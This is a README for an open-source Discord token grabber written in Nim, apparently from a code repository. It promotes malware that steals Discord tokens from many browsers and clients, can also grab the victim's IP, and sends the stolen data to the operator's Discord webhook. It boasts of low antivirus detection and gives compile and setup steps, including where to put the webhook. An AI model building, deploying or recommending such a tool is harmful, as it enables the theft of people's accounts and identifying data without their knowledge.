First OSS Discord Token Grabber written in Nim
- Small size compared to Python loggers (410~kb)
- Written with pure libs (no need for DLLs)
- No caching, everything done on-time
- Supports a LOT of browsers and clients
- Optional IP Grabber (can be toggled in file)
- Wow only 3 detections
- MUST: Install Nim (using my guide if you want)
- Since this needs a Discord Webhook (like all things do), go create one
- Download repo as zip / git clone, and store somewhere
- Replace the webhook link, user ID and toggle whatever you need
- Run
Compile.bat
, which will sort out everything for you
Or if you want to do manually:
nimble install puppy
nimble install regex
nim c -d:danger --gc:arc -d:useMalloc --panics:on <file>.nim
strip -s <file>.exe
- ME (NullCode1337)
- narimiran and his legendary guide
- Yardanico, enthus1ast and Rika on Nim Discord
- Without embed:
- With embed:
- Testing on PCs without Nim toolchain
- Nicer upload (using embeds)
- Make code less weird
- IP Grabber
Archived because it's totally complete, like I have nothing else important that I want to add